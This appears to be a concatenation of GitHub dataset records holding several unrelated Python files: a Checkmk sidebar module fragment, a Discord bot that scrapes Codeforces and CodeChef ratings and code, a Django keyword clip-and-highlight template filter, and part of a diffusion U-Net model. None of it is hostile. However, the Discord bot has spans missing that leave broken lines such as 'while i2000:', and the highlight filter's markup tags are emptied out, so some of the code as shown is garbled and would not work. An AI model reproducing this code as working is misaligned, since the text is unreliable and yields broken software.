|\n# '----------------------------------------------------------------------'\n\n\nclass CustomSnapins(pagetypes.Overridable):\n @classmethod\n def type_name(cls):\n return \"custom_snapin\"\n\n @classmethod\n def phrase(cls, phrase):\n return {\n \"title\": _(\"Custom snapin\"),\n \"title_plural\": _(\"Custom snapins\"),\n #\"add_to\" : _(\"Add to custom snapin list\"),\n \"clone\": _(\"Clone snapin\"),\n \"create\": _(\"Create snapin\"),\n \"edit\": _(\"Edit snapin\"),\n \"new\": _(\"New snapin\"),\n }.get(phrase, pagetypes.Base.phrase(phrase))\n\n @classmethod\n def parameters(cls, mode):\n parameters = super(CustomSnapins, cls).parameters(mode)\n\n parameters += [(\n cls.phrase(\"title\"),\n # sort-index, key, valuespec\n [(2.5, \"custom_snapin\",\n CascadingDropdown(\n title=_(\"Snapin type\"),\n choices=cls._customizable_snapin_type_choices,\n ))])]\n\n return parameters\n\n @classmethod\n def _customizable_snapin_type_choices(cls):\n choices = []\n for snapin_type_id, snapin_type in sorted(snapin_registry.get_customizable_snapin_types()):\n choices.append((snapin_type_id, snapin_type.title(),\n Dictionary(\n title=_(\"Parameters\"),\n elements=snapin_type.vs_parameters(),\n optional_keys=[],\n )))\n return choices\n\n\npagetypes.declare(CustomSnapins)\n\n\ndef _register_custom_snapins():\n \"\"\"First remove all previously registered custom snapins, then register\n the currently configured ones\"\"\"\n CustomSnapins.load()\n snapin_registry.register_custom_snapins(CustomSnapins.instances_sorted())\n\n\n#.\n# .--Add Snapin----------------------------------------------------------.\n# | _ _ _ ____ _ |\n# | / \\ __| | __| | / ___| _ __ __ _ _ __ (_)_ __ |\n# | / _ \\ / _` |/ _` | \\___ \\| '_ \\ / _` | '_ \\| | '_ \\ |\n# | / ___ \\ (_| | (_| | ___) | | | | (_| | |_) | | | | | |\n# | /_/ \\_\\__,_|\\__,_| |____/|_| |_|\\__,_| .__/|_|_| |_| |\n# | |_| |\n# '----------------------------------------------------------------------'\n\n\n@cmk.gui.pages.register(\"sidebar_add_snapin\")\ndef page_add_snapin():\n PageAddSnapin(config.user, config.sidebar).show()\n\n\nclass PageAddSnapin(object):\n def __init__(self, user, default_config):\n super(PageAddSnapin, self).__init__()\n self._user_config = UserSidebarConfig(user, default_config)\n\n def show(self):\n # type: () -> None\n if not config.user.may(\"general.configure_sidebar\"):\n raise MKGeneralException(_(\"You are not allowed to change the sidebar.\"))\n\n html.header(_(\"Available snapins\"))\n\n html.begin_context_buttons()\n CustomSnapins.context_button_list()\n html.end_context_buttons()\n\n addname = html.request.var(\"name\")\n if addname in snapin_registry and addname not in self._used_snapins(\n ) and html.check_transaction():\n self._user_config.add_snapin(UserSidebarSnapin.from_snapin_type_id(addname))\n self._user_config.save()\n html.reload_sidebar()\n\n self._show_builtin_snapins()\n\n def _show_builtin_snapins(self):\n # type: () -> None\n used_snapins = self._used_snapins()\n\n html.open_div(class_=[\"add_snapin\"])\n for name, snapin_class in sorted(snapin_registry.items()):\n if name in used_snapins:\n continue\n if not config.user.may(snapin_class.permission_name()):\n continue # not allowed for this user\n\n transid = html.transaction_manager.get()\n url = 'sidebar_add_snapin.py?name=%s&_transid=%s&pos=top' % (name, transid)\n html.open_div(class_=\"snapinadder\",\n onmouseover=\"this.style.cursor=\\'pointer\\';\",\n onmousedown=\"window.location.href=\\'%s\\'; return false;\" % url)\n\n html.open_div(class_=[\"snapin_preview\"])\n html.div('', class_=[\"clickshield\"])\n SidebarRenderer().render_snapin(UserSidebarSnapin.from_snapin_type_id(name))\n html.close_div()\n html.div(snapin_class.description(), class_=[\"description\"])\n html.close_div()\n\n html.close_div()\n html.footer()\n\n def _used_snapins(self):\n # type: () -> List[Any]\n return [snapin.snapin_type.type_name() for snapin in self._user_config.snapins]\n\n\n# TODO: This is snapin specific. Move this handler to the snapin file\n@cmk.gui.pages.register(\"sidebar_ajax_set_snapin_site\")\ndef ajax_set_snapin_site():\n html.set_output_format(\"json\")\n ident = html.request.var(\"ident\")\n if ident not in snapin_registry:\n raise MKUserError(None, _(\"Invalid ident\"))\n\n site = html.request.var(\"site\")\n site_choices = dict([ (\"\", _(\"All sites\")), ] \\\n + config.site_choices())\n\n if site not in site_choices:\n raise MKUserError(None, _(\"Invalid site\"))\n\n snapin_sites = config.user.load_file(\"sidebar_sites\", {}, lock=True)\n snapin_sites[ident] = site\n config.user.save_file(\"sidebar_sites\", snapin_sites, unlock=True)\n","repo_name":"Yeshwanth37/Nfina","sub_path":"Nfina/htdocs/themes/facelift/python/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":30419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14637740688","text":"import os\nimport pickle\nimport discord\nimport json\nfrom time import sleep\nfrom requests import request\nfrom bs4 import BeautifulSoup\n\n\ncommands = ['add_CC','add_CF','CC_rating','CF_rating','CF_code','CF_contest','help','CC_code']\ndef get_rank(rating):\n if rating<1200:\n return (0,'newbie')\n elif rating<1400:\n return (1,'pupil')\n elif rating<1600:\n return (2,'specialist')\n elif rating<1800:\n return (3,'expert')\n else:\n return (4,'candidate master')\ndef get_star(rating):\n if rating<1400:\n return 1\n elif rating<1600:\n return 2\n elif rating<1800:\n return 3\n elif rating<2000:\n return 4\n elif rating<2200:\n return 5\n elif rating<2500:\n return 6\n else:\n return 7\ndef getCC_user(user):\n profile=request('GET','https://www.codechef.com/users/'+user)\n print(profile)\n if not profile.ok:\n return False\n soup=BeautifulSoup(profile.content)\n rating = soup.find('div', attrs={'class':'rating-number'})\n #await message.channel.send('

'+user+'<\\h4>\\n'+'Current rating: '+rating.text)\n return rating\ndef getCF_user(user):\n data = request('GET','https://codeforces.com/api/user.rating?handle='+user)\n if not data.ok:\n return ''\n data=data.json()\n ratings = data['result']\n return ratings[-1]['newRating']\n \ndef event_identifier(message):\n message_length=len(message)\n # matches string with [command_type]::[command attributes]:: ....\n check = message.split('::')\n if len(check)>=1:\n command = check[0]\n attr = check[1:]\n if command not in commands:\n return False\n return command,attr\n return False\ndef add_cc_handle(owner,handle):\n \n try:\n \n fin = open('cc.dat','rb')\n except:\n fout = open('cc.dat','wb')\n fout.close()\n fin = open('cc.dat','rb')\n while 1:\n try:\n user,username = pickle.load(fin)\n if user==owner or username==handle :\n fin.close()\n return False\n except:\n fin.close()\n break\n fout = open('cc.dat','ab')\n pickle.dump((owner,handle),fout)\n fout.close()\n return True\ndef add_cf_handle(owner,handle):\n try:\n \n fin = open('cf.dat','rb')\n except:\n fout = open('cf.dat','wb')\n fout.close()\n fin = open('cf.dat','rb')\n while 1:\n try:\n user,username = pickle.load(fin)\n if user==owner or username==handle:\n fin.close()\n return False\n except:\n fin.close()\n break\n fout = open('cf.dat','ab')\n pickle.dump((owner,handle),fout)\n \n fout.close()\n return True\n\n\ndef cf_ranklist(contest_code):\n fin = open('cf.dat','rb')\n guild_handles = {}\n while 1:\n try:\n user,username = pickle.load(fin)\n guild_handles[username] = user\n except:\n fin.close()\n break\n url = \"https://codeforces.com/api/contest.ratingChanges?contestId=\"+str(contest_code)\n page = request('GET',url)\n if not page.ok:\n return []\n data = page.json()\n ranklist = []\n counter = 1\n for row in data['result']:\n username = row['handle'] # works for non team handles else only first handle considered\n if guild_handles.get(username,None):\n ranklist.append((counter,row['rank'],username,guild_handles[username],row['oldRating'],row['newRating']))\n counter += 1\n return ranklist \n \nfin=open('token.txt','r')\ntoken=fin.readline().strip()\nfin.close()\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n content = message.content\n content=content.strip()\n if content[0]=='>':\n content=content[1:]\n else:\n return\n \n if not message.guild:\n await message.channel.send(\"no replies to DM's :punch:\")\n return\n if event_identifier(content):\n command,attr=event_identifier(content)\n print('command')\n if command=='add_CC':\n user=attr[0]\n profile=request('GET','https://www.codechef.com/users/'+user)\n print(profile)\n if not profile.ok:\n await message.channel.send('Invalid codechef username or try after some time')\n return\n try:\n \n if add_cc_handle(str(message.author),attr[0]):\n soup=BeautifulSoup(profile.content)\n rating = soup.find('div', attrs={'class':'rating-number'})\n await message.channel.send('Current user rating: '+rating.text)\n await message.channel.send('username added success')\n else:\n await message.channel.send('owner or user alerady exist')\n except IndexError:\n await message.channel.send('Improper Command')\n \n elif command=='add_CF':\n try:\n if add_cf_handle(str(message.author),attr[0]):\n data = request('GET','https://codeforces.com/api/user.rating?handle='+attr[0])\n if not data.ok:\n await message.channel.send('Invalid codeforces handle')\n return\n data=data.json()\n ratings = data['result']\n rank = get_rank(ratings[-1]['newRating'])\n user=message.author\n # Issue#1 adding roles error 403\n #await user.add_roles(discord.utils.get(user.guild.roles, name=rank[1]))\n await message.channel.send('Database Updated\\n>'+attr[0]+\":\"+rank[1]+\"(\"+str(ratings[-1]['newRating'])+\")\")\n else:\n await message.channel.send('owner or user alerady exist')\n except IndexError:\n await message.channel.send('Improper Command')\n elif command=='CC_rating':\n user=attr[0]\n rating = getCC_user(user)\n if not rating:\n await message.channel.send('Invalid User\\n try again after sometime')\n else:\n rank=get_star(int(rating.text))\n stars=':star: '*rank\n stars+='\\n'\n await message.channel.send('**'+user+'**\\n'+stars+'Current rating: '+rating.text)\n elif command=='CF_rating':\n user = attr[0]\n if user=='all':\n await message.channel.send('Generating rated user list.\\nThis may take some time.')\n fin1 =open('cf.dat','rb')\n all_users = []\n c=0\n while 1:\n try:\n owner, user = pickle.load(fin1)\n print(owner,user)\n rating = getCF_user(user)\n all_users.append((rating, user, owner))\n except EOFError:\n break\n except IndexError:\n continue\n #rating = getCF_user(user)\n #all_users.append((rating, user, owner)) \n \n fin1.close()\n all_users.sort(reverse=True)\n result='```'\n print(len(all_users))\n c=1\n for user in all_users:\n result+=str(c)+\" \"+str(user[0])+\" \"+user[1]+(\" \"*(15-len(user[1])))+user[2]+'\\n'\n c+=1\n if len(result)>=1997:\n result = result[4:]\n i=0\n while i2000:\n i=0\n code = code[7:]\n code = code[:-3]\n while irow[-2] else str(row[-1]-row[-2]))\n final_ranklist += '\\n'\n final_ranklist += '```'\n await message.channel.send(final_ranklist)\n return\n elif command == 'CC_code':\n if len(attr)!=1:\n await message.channel.send('Invalid command structure')\n return\n url = \"https://www.codechef.com/viewsolution/\"+str(attr[0])\n page = request('GET',url, headers={'User-Agent': 'Mozilla/5.0'})\n if not page.ok:\n await message.channel.send('Invalid code!!!')\n return\n soup = BeautifulSoup(page.content)\n content = soup.find_all('script')\n data=''\n for block in content:\n if 'meta_info' in block.text:\n data=block.text\n break\n if not data:\n await message.channel.send('Something went wrong!!')\n return\n data = data[data.find('{'):-2]\n data = json.loads(data)\n code=\"```cpp\\n\"\n code+=data['data']['plaintext']\n code+=\"```\"\n length = len(code)\n if length>2000:\n i=0\n code = code[7:]\n code = code[:-3]\n while i= nloc['l'] and le <= nloc['l'] + nloc['ks']:\n # if le overlaps the next location\n # merge the two together\n loc = {\n 'l': loc['l'],\n 'ks': nloc['l'] + nloc['ks'] - loc['l']\n }\n\n # increment the number we'll skip\n sk += 1\n else:\n gloc.append(loc)\n i += sk\n sk = 1\n loc = locations[i]\n # if that was the last one, add it and quit\n if sk + i >= ln:\n gloc.append(loc)\n break\n\n return gloc\n\n\ndef process_keywords(keywords):\n \"\"\"\n This method filters out bay characters and splits the keywords\n \"\"\"\n\n for val in [\"'\", '\"', \"(\", \")\"]:\n keywords = keywords.replace(val, \" \")\n for val in [\" OR \", \" NOT \", \" AND \"]:\n keywords = keywords.replace(val, \" \")\n\n keywords.replace(\" \", \" \")\n\n key_array = keywords.split(\" \")\n key_array = [k for k in key_array if len(k) >= MIN_KEYWORD_SIZE]\n\n return key_array\n\n\ndef find_word_breaks(start, end, bstart, bend, desc):\n \"\"\"\n Expand a window in a block of text to the next word break\n Example:\n Total size is 'clip_size'\n v <-start end-> v\n |-------|=================|---------|\n ^ ----- ^\n ^ bstart bend ^\n 'start' and 'end' are pointers in the string calculated\n based off of the 'best' clip in the desc + some padding\n\n bstart: 'best start'\n bend: 'best end'\n bstart is the calulated max start to keep the ending clip at clip_size\n bend is the caluated max end to keep the ending clip at clip_size\n\n We want to clip at word breaks so we scan from start to bstart ending at first word break, 0 or bstart\n\n \"\"\"\n\n terms = (\" \", \",\", \";\", \":\", \".\")\n # find word break\n desc_size = len(desc)\n\n while start >= bstart and start > 0: # needs to be >\n #local specific word break probably needed\n if desc[start] in terms:\n break\n else:\n start -= 1\n\n while end <= bend and end < desc_size:\n if desc[end] in terms:\n break\n else:\n end += 1\n\n return (start, end)\n\n\n# Main Code\n\n@register.filter()\ndef clip_and_highlite(desc, keywords, config=None):\n \"\"\" Run clipping and highlighting on desc \"\"\"\n if config is None:\n config = {}\n try:\n return clip_and_highlite_inner(desc, keywords, True, config)\n #pylint: disable=W0703\n except Exception:\n if desc:\n return desc[:CLIP_SIZE]\n else:\n return \"\"\n\n\n@register.filter()\ndef highlite(desc, keywords, config=None):\n \"\"\" Run highlighting on desc \"\"\"\n if config is None:\n config = {}\n try:\n return clip_and_highlite_inner(desc, keywords, False, config)\n #pylint: disable=W0703\n except Exception:\n if desc:\n return desc[:CLIP_SIZE]\n else:\n return \"\"\n\n\n#pylint: disable=R0912\ndef clip_and_highlite_inner(desc, keywords, clip=False, config=None):\n \"\"\" Clipping and highlighting internal implementaiton \"\"\"\n if config is None:\n config = {}\n clip_size = config.get(\"clip_size\", CLIP_SIZE)\n # Setup the sizes\n if not desc:\n return None\n if not keywords:\n (start, end) = find_word_breaks(0, clip_size - 10, 0, clip_size, desc)\n return desc[start:end]\n\n desc_size = len(desc)\n lkeywords = keywords.lower()\n lkeys = process_keywords(lkeywords)\n opt_endword = config.get(\"opt_endword\")\n\n # Make this case insensitive\n lower_desc = desc.lower()\n\n # start the window defaulting to the first chunk. If we don't find the keyword\n # we'll just use this\n start = 0\n end = clip_size\n\n # Create our array of found locations. These need to be relative to the start\n # So we need to create an off-set\n foundlocs = []\n\n # This runs multiple searches for multple keywords\n # Maybe a way to carry information from one to the next\n for lkey in lkeys:\n off = 0\n ldesc = lower_desc\n length = len(lkey)\n a = ldesc.find(lkey)\n while a >= 0:\n off = off + a\n t_length = length\n\n if off == 0 or (off > 0 and not desc[off - 1].isalnum()):\n\n # Match the entire word, even if our keyword is only a prefix\n if opt_endword == \"stem\":\n while (off + t_length <= desc_size and desc[off + t_length].isalnum()):\n t_length += 1\n\n if opt_endword == \"whole\":\n # In mathcing only the whole word there are two conditions we need to look for\n # 1: That we're at the end of the description, thus at the end of a 'word'\n # 2: That we're not at the end, and the character at the end of the match is not an\n # alphanumeric character\n if off + t_length == desc_size or \\\n (off + t_length < desc_size and not desc[off + t_length].isalnum()):\n foundlocs.append({\n 'l': off,\n 'ks': t_length\n })\n else:\n # ks is the key-size\n foundlocs.append({\n 'l': off, # l is the location where we found it\n 'ks': t_length\n })\n\n off += t_length # We're past the key, add the length\n ldesc = ldesc[a + t_length:]\n a = ldesc.find(lkey)\n\n if foundlocs:\n # Have to sort the array based on location\n if len(lkeys) > 1:\n foundlocs = sorted(foundlocs, key=lambda d: d['l'] + d['ks'])\n foundlocs = merge_locations(foundlocs)\n\n # this array keeps track of our 'best' find\n # 0 - starting location\n # 1 - ending location\n # 2 - number of matches we found in that location\n # 3 - where in the found location array we started\n\n best = [start, end, 0, 0]\n\n if len(desc) <= clip_size or not clip:\n best = [start, end, len(foundlocs), 0]\n else:\n t = 0\n while t < len(foundlocs):\n t_start = foundlocs[t]['l'] # start of our range\n t_end = 0 # length of the range\n c = 0 # number of keywords in range\n\n for loc in foundlocs[t:]: # Now loop through remaining found locations\n if abs((loc['l'] + loc['ks']) - t_start) < clip_size:\n c = c + 1\n t_end = loc['l'] + loc['ks']\n else:\n break\n if c > best[2]:\n best = [t_start, t_end, c, t]\n t = t + 1\n\n overage = int((clip_size - (best[1] - best[0])) / 2)\n\n start = best[0]\n end = best[1]\n\n # if we found a lot of space, we need to pad before we find word break\n if overage > clip_size / 10:\n start -= int(overage / 3 * 2)\n end += int(overage / 3 * 2)\n\n (start, end) = find_word_breaks(start, end, best[0] - overage, best[1] + overage, desc)\n\n #Fix start and end if we went over\n if start < 0:\n end -= start\n start = 0\n elif end > desc_size:\n start = start + (end - desc_size)\n end = desc_size\n\n # Now highlite\n\n # Go through the locations in the winning range\n # and build a string using as the keyword\n # the goal is since we already know the locations of the\n # keywords we don't need to search for them again\n pre = desc[start:foundlocs[best[3]]['l']]\n\n # loop through our matches. best[2] is the number of matches we found\n for cl in range(0, best[2]):\n clt = cl + best[3] # add array offset to our current range\n l = foundlocs[clt]['l'] # grab the locaiton from foundlocs\n ks = foundlocs[clt]['ks'] # grab the key-size\n\n pre += \"\"\n pre += desc[l:l+ks] # cut out keyword\n pre += \"\"\n\n if cl < best[2]-1: # if we're have another element after,\n # append the characters between the end of the keyword\n # and the next keyword\n pre += desc[l+ks:foundlocs[clt + 1]['l']]\n\n pre_end = best[3] + best[2] - 1\n pre += desc[(foundlocs[pre_end]['l'] + foundlocs[pre_end]['ks']):end]\n\n if clip:\n if start > 0:\n pre = \"... \" + pre\n if end < desc_size:\n pre += \" ...\"\n\n return mark_safe(pre)\n else:\n\n if end < desc_size:\n (start, end) = find_word_breaks(start, end - clip_size / 15, start, end - 4, desc)\n return desc[start:end] + \" ...\"\n else:\n return desc[start:end]\n","repo_name":"alyago/django-web","sub_path":"web-serpng/code/serpng/jobs/templatetags/clip_and_highlite.py","file_name":"clip_and_highlite.py","file_ext":"py","file_size_in_byte":10145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70896584091","text":"import math\nimport copy\nfrom pathlib import Path\nfrom random import random\nfrom functools import partial\nfrom collections import namedtuple\nfrom multiprocessing import cpu_count\n\nimport torch\nfrom torch import nn, einsum\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom torch.optim import Adam\n\nfrom torchvision import transforms as T, utils\n\nfrom einops import rearrange, reduce, repeat\nfrom einops.layers.torch import Rearrange\n\nfrom PIL import Image\nfrom tqdm.auto import tqdm\n\nfrom transformers import AutoConfig\nfrom transformers.models.bert.modeling_bert import BertEncoder, BertModel\n\n# constants\nModelPrediction = namedtuple('ModelPrediction', ['pred_noise', 'pred_x_start'])\n\n# helpers functions\ndef exists(x):\n return x is not None\n\ndef default(val, d):\n if exists(val):\n return val\n return d() if callable(d) else d\n\ndef identity(t, *args, **kwargs):\n return t\n\ndef cycle(dl):\n while True:\n for data in dl:\n yield data\n\ndef has_int_squareroot(num):\n return (math.sqrt(num) ** 2) == num\n\ndef num_to_groups(num, divisor):\n groups = num // divisor\n remainder = num % divisor\n arr = [divisor] * groups\n if remainder > 0:\n arr.append(remainder)\n return arr\n\ndef convert_image_to_fn(img_type, image):\n if image.mode != img_type:\n return image.convert(img_type)\n return image\n\n# normalization functions\n\ndef normalize_to_neg_one_to_one(img):\n return img * 2 - 1\n\ndef unnormalize_to_zero_to_one(t):\n return (t + 1) * 0.5\n\n# small helper modules\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n\n def forward(self, x, *args, **kwargs):\n return self.fn(x, *args, **kwargs) + x\n\ndef Upsample(dim, dim_out = None):\n return nn.Sequential(\n nn.Upsample(scale_factor = 2, mode = 'nearest'),\n nn.Conv2d(dim, default(dim_out, dim), 3, padding = 1)\n )\n\ndef Downsample(dim, dim_out = None):\n return nn.Sequential(\n #Rearrange('b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = 1, p2 = 1),\n Rearrange('b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = 2, p2 = 2),\n nn.Conv2d(dim * 4, default(dim_out, dim), 1)\n )\n\nclass WeightStandardizedConv2d(nn.Conv2d):\n \"\"\"\n https://arxiv.org/abs/1903.10520\n weight standardization purportedly works synergistically with group normalization\n \"\"\"\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-3\n\n weight = self.weight\n mean = reduce(weight, 'o ... -> o 1 1 1', 'mean')\n var = reduce(weight, 'o ... -> o 1 1 1', partial(torch.var, unbiased = False))\n normalized_weight = (weight - mean) * (var + eps).rsqrt()\n\n return F.conv2d(x, normalized_weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n\nclass LayerNorm(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.g = nn.Parameter(torch.ones(1, dim, 1, 1))\n\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-3\n var = torch.var(x, dim = 1, unbiased = False, keepdim = True)\n mean = torch.mean(x, dim = 1, keepdim = True)\n return (x - mean) * (var + eps).rsqrt() * self.g\n\nclass PreNorm(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.fn = fn\n self.norm = LayerNorm(dim)\n\n def forward(self, x):\n x = self.norm(x)\n return self.fn(x)\n\n# sinusoidal positional embeds\n\nclass SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, x):\n device = x.device\n half_dim = self.dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=device) * -emb)\n emb = x[:, None] * emb[None, :]\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\nclass RandomOrLearnedSinusoidalPosEmb(nn.Module):\n \"\"\" following @crowsonkb 's lead with random (learned optional) sinusoidal pos emb \"\"\"\n \"\"\" https://github.com/crowsonkb/v-diffusion-jax/blob/master/diffusion/models/danbooru_128.py#L8 \"\"\"\n\n def __init__(self, dim, is_random = False):\n super().__init__()\n assert (dim % 2) == 0\n half_dim = dim // 2\n self.weights = nn.Parameter(torch.randn(half_dim), requires_grad = not is_random)\n\n def forward(self, x):\n x = rearrange(x, 'b -> b 1')\n freqs = x * rearrange(self.weights, 'd -> 1 d') * 2 * math.pi\n fouriered = torch.cat((freqs.sin(), freqs.cos()), dim = -1)\n fouriered = torch.cat((x, fouriered), dim = -1)\n return fouriered\n\n# building block modules\nclass Block(nn.Module):\n def __init__(self, dim, dim_out, groups = 8):\n super().__init__()\n self.proj = WeightStandardizedConv2d(dim, dim_out, 3, padding = 1)\n self.norm = nn.GroupNorm(groups, dim_out)\n self.act = nn.SiLU()\n\n def forward(self, x, scale_shift = None):\n x = self.proj(x)\n x = self.norm(x)\n\n if exists(scale_shift):\n scale, shift = scale_shift\n x = x * (scale + 1) + shift\n\n x = self.act(x)\n return x\n\nclass ResnetBlock(nn.Module):\n def __init__(self, dim, dim_out, *, time_emb_dim = None, groups = 8):\n super().__init__()\n self.mlp = nn.Sequential(\n nn.SiLU(),\n nn.Linear(time_emb_dim, dim_out * 2)\n ) if exists(time_emb_dim) else None\n\n self.block1 = Block(dim, dim_out, groups = groups)\n self.block2 = Block(dim_out, dim_out, groups = groups)\n self.res_conv = nn.Conv2d(dim, dim_out, 1) if dim != dim_out else nn.Identity()\n\n def forward(self, x, time_emb = None):\n\n scale_shift = None\n if exists(self.mlp) and exists(time_emb):\n time_emb = self.mlp(time_emb)\n time_emb = rearrange(time_emb, 'b c -> b c 1 1')\n scale_shift = time_emb.chunk(2, dim = 1)\n\n h = self.block1(x, scale_shift = scale_shift)\n\n h = self.block2(h)\n\n return h + self.res_conv(x)\n\nclass LinearAttention(nn.Module):\n def __init__(self, dim, heads = 4, dim_head = 32):\n super().__init__()\n self.scale = dim_head ** -0.5\n self.heads = heads\n hidden_dim = dim_head * heads\n self.to_qkv = nn.Conv2d(dim, hidden_dim * 3, 1, bias = False)\n\n self.to_out = nn.Sequential(\n nn.Conv2d(hidden_dim, dim, 1),\n LayerNorm(dim)\n )\n\n def forward(self, x):\n b, c, h, w = x.shape\n qkv = self.to_qkv(x).chunk(3, dim = 1)\n q, k, v = map(lambda t: rearrange(t, 'b (h c) x y -> b h c (x y)', h = self.heads), qkv)\n\n q = q.softmax(dim = -2)\n k = k.softmax(dim = -1)\n\n q = q * self.scale\n v = v / (h * w)\n\n context = torch.einsum('b h d n, b h e n -> b h d e', k, v)\n\n out = torch.einsum('b h d e, b h d n -> b h e n', context, q)\n out = rearrange(out, 'b h c (x y) -> b (h c) x y', h = self.heads, x = h, y = w)\n return self.to_out(out)\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads = 4, dim_head = 32):\n super().__init__()\n self.scale = dim_head ** -0.5\n self.heads = heads\n hidden_dim = dim_head * heads\n\n self.to_qkv = nn.Conv2d(dim, hidden_dim * 3, 1, bias = False)\n self.to_out = nn.Conv2d(hidden_dim, dim, 1)\n\n def forward(self, x):\n b, c, h, w = x.shape\n qkv = self.to_qkv(x).chunk(3, dim = 1)\n q, k, v = map(lambda t: rearrange(t, 'b (h c) x y -> b h c (x y)', h = self.heads), qkv)\n\n q = q * self.scale\n\n sim = einsum('b h d i, b h d j -> b h i j', q, k)\n attn = sim.softmax(dim = -1)\n out = einsum('b h i j, b h d j -> b h i d', attn, v)\n\n out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = h, y = w)\n return self.to_out(out)\n\n# model\nclass Unet(nn.Module):\n def __init__(\n self,\n dim,\n init_dim = None,\n out_dim = None,\n dim_mults=(1, 2, 4, 8),\n channels = 3,\n self_condition = False,\n resnet_block_groups = 8,\n learned_variance = False,\n learned_sinusoidal_cond = False,\n random_fourier_features = False,\n learned_sinusoidal_dim = 16\n ):\n super().__init__()\n\n # determine dimensions\n self.channels = channels\n self.self_condition = self_condition\n input_channels = channels * (2 if self_condition else 1)\n\n init_dim = default(init_dim, dim)\n self.init_conv = nn.Conv2d(input_channels, init_dim, 7, padding = 3)\n\n dims = [init_dim, *map(lambda m: dim * m, dim_mults)]\n in_out = list(zip(dims[:-1], dims[1:]))\n\n block_klass = partial(ResnetBlock, groups = resnet_block_groups)\n\n # time embeddings\n\n time_dim = dim * 4\n\n self.random_or_learned_sinusoidal_cond = learned_sinusoidal_cond or random_fourier_features\n\n if self.random_or_learned_sinusoidal_cond:\n sinu_pos_emb = RandomOrLearnedSinusoidalPosEmb(learned_sinusoidal_dim, random_fourier_features)\n fourier_dim = learned_sinusoidal_dim + 1\n else:\n sinu_pos_emb = SinusoidalPosEmb(dim)\n fourier_dim = dim\n\n self.time_mlp = nn.Sequential(\n sinu_pos_emb,\n nn.Linear(fourier_dim, time_dim),\n nn.GELU(),\n nn.Linear(time_dim, time_dim)\n )\n\n # layers\n self.downs = nn.ModuleList([])\n self.ups = nn.ModuleList([])\n num_resolutions = len(in_out)\n\n for ind, (dim_in, dim_out) in enumerate(in_out):\n is_last = ind >= (num_resolutions - 1)\n\n self.downs.append(nn.ModuleList([\n block_klass(dim_in, dim_in, time_emb_dim = time_dim),\n block_klass(dim_in, dim_in, time_emb_dim = time_dim),\n Residual(PreNorm(dim_in, LinearAttention(dim_in))),\n Downsample(dim_in, dim_out) if not is_last else nn.Conv2d(dim_in, dim_out, 3, padding = 1)\n ]))\n\n mid_dim = dims[-1]\n self.mid_block1 = block_klass(mid_dim, mid_dim, time_emb_dim = time_dim)\n self.mid_attn = Residual(PreNorm(mid_dim, Attention(mid_dim)))\n self.mid_block2 = block_klass(mid_dim, mid_dim, time_emb_dim = time_dim)\n\n for ind, (dim_in, dim_out) in enumerate(reversed(in_out)):\n is_last = ind == (len(in_out) - 1)\n\n self.ups.append(nn.ModuleList([\n block_klass(dim_out + dim_in, dim_out, time_emb_dim = time_dim),\n block_klass(dim_out + dim_in, dim_out, time_emb_dim = time_dim),\n Residual(PreNorm(dim_out, LinearAttention(dim_out))),\n Upsample(dim_out, dim_in) if not is_last else nn.Conv2d(dim_out, dim_in, 3, padding = 1)\n ]))\n\n default_out_dim = channels * (1 if not learned_variance else 2)\n self.out_dim = default(out_dim, default_out_dim)\n\n self.final_res_block = block_klass(dim * 2, dim, time_emb_dim = time_dim)\n self.final_conv = nn.Conv2d(dim, self.out_dim, 1)\n\n def forward(self, x, time, x_self_cond = None):\n # if color image: [b, k, c, h, w] -> [b, k*c, h, w]\n if len(x.shape) == 5: # reshape to fit Unet\n re = True\n x = rearrange(x, 'b k c ... -> b (k c) ...')\n else:\n re = False \n\n if self.self_condition:\n x_self_cond = default(x_self_cond, lambda: torch.zeros_like(x))\n x = torch.cat((x_self_cond, x), dim = 1)\n x = self.init_conv(x)\n r = x.clone()\n\n t = self.time_mlp(time)\n\n h = []\n\n for block1, block2, attn, downsample in self.downs:\n x = block1(x, t)\n h.append(x)\n\n x = block2(x, t)\n x = attn(x)\n h.append(x)\n\n x = downsample(x)\n\n x = self.mid_block1(x, t)\n x = self.mid_attn(x)\n x = self.mid_block2(x, t)\n\n for block1, block2, attn, upsample in self.ups:\n x = torch.cat((x, h.pop()), dim = 1)\n x = block1(x, t)\n\n x = torch.cat((x, h.pop()), dim = 1)\n x = block2(x, t)\n x = attn(x)\n\n x = upsample(x)\n\n x = torch.cat((x, r), dim = 1)\n\n x = self.final_res_block(x, t)\n x = self.final_conv(x)\n\n if re:\n x = rearrange(x, 'b (k c) ... -> b k c ...', c=3)\n\n return x\n\n\n# transformer model\nclass Transformer(nn.Module):\n \"\"\"\n The full Transformer model with attention and timestep embedding.\n :param input_dims: dims of the input Tensor.\n :param output_dims: dims of the output Tensor.\n :param hidden_t_dim: dims of time embedding.\n :param dropout: the dropout probability.\n :param config/config_name: the config of PLMs.\n :param init_pretrained: bool, init whole network params with PLMs.\n :param vocab_size: the size of vocabulary\n \"\"\"\n\n def __init__(\n self,\n emb_dim,\n vocab_size,\n dropout=0,\n config=None,\n config_name='bert-base-uncased',\n init_pretrained='no',\n logits_mode=1,\n learned_sinusoidal_cond = False,\n random_fourier_features = False,\n learned_sinusoidal_dim = 16\n ):\n super().__init__()\n\n 